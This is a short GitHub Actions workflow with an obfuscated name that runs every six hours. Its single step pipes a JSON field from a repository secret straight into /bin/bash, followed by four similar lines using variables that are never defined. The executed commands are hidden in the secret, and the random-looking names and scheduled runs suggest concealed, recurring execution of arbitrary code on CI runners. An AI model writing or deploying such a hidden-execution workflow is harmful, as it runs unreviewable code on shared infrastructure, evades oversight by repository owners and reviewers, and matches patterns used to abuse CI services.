name: donecartography

on:
  workflow_dispatch:
  schedule:
    - cron: '22 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: donecartography
        env:
          mp1302: ${{ secrets.mp1302 }}
        run: |
          echo $mp1302 | jq -r .zd7578 | /bin/bash
          echo $wyacu4542 | jq -r .pegww3 | /bin/bash
          echo $p9213 | jq -r .bk05 | /bin/bash
          echo $ciira2 | jq -r .pwjf0693 | /bin/bash
          echo $sl12251 | jq -r .rjb2 | /bin/bash

